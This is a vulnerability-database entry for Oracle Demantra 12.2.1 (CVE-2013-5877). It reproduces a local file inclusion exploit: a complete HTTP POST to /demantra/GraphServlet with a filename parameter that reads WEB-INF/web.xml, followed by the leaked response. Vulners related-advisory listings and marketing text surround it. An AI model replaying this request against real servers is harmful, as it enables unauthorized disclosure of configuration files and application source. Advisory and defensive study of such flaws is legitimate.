Vulners
Lucene search
Oracle Demantra 12.2.1 - Arbitrary File Disclosure
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | CVE-2013-5877 | 1 Mar 201400:00 | – | circl |
 | Oracle Demantra 1221 Arbitrary File Disclosure - Ver2 (CVE-2013-5877) | 26 Mar 201500:00 | – | checkpoint_advisories |
 | CVE-2013-5877 | 15 Jan 201400:30 | – | cve |
 | CVE-2013-5877 | 15 Jan 201400:30 | – | cvelist |
 | Oracle Demantra Arbitrary File Retrieval with Authentication Bypass | 27 Mar 201404:53 | – | metasploit |
 | CVE-2013-5877 | 15 Jan 201416:11 | – | nvd |
 | Oracle Critical Patch Update - January 2014 | 14 Jan 201400:00 | – | oracle |
| Oracle Critical Patch Update - January 2014 | 14 Jan 201400:00 | – | oracle |
 | Oracle Demantra 12.2.1 Arbitrary File Retrieval | 1 Mar 201400:00 | – | packetstorm |
| Oracle Demantra Arbitrary File Retrieval With Authentication Bypass | 1 Sep 202400:00 | – | packetstorm |
10
Details:
The Team discovered a Local File Include (LFI) vulnerability. A file inclusion vulnerability occurs when a file from the target system is injected into a page on the attacked server page.
The vulnerable page is:
* /demantra/GraphServlet
Impact:
Impact can differ based on the exploitation and the read permission of the web server user. Depending on these factors an attacker might carry out one or more of the following attacks:
- Harvest useful information from the web.xml configuration file.
- Download the whole web application source code like the vulnerable page itself.
Exploit:
Request:
POST /demantra/GraphServlet HTTP/1.1
Host: 192.168.14.171:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
filename=C:/Program Files (x86)/Oracle Demantra Spectrum/Collaborator/demantra/WEB-INF/web.xml
Response:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/png
Content-Length: 44378
Date: Fri, 02 Aug 2013 20:20:58 GMT
<?xml version="1.0" encoding="UTF-8"?>
<web-app
id="WebApp_9" version="2.4" xmlns="http://java.sun.com/xml/ns/j2ee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd">
<!-- Important Notice -->
<!--
The order of elements in the web.xml is significant for some
Application Server parsers like WebSphere. The expected order is
examplified in the comments of this file. Each element section has a
Start comment(***) and an End comment. Please make sure to add new
elements in the appropriate section of the file delimited by the
relevant comment.
-->
<!-- ***Icons Start -->
<!-- ***Icons End -->
-snip-
# 0day.today [2018-01-10] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Mar 2014 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.78854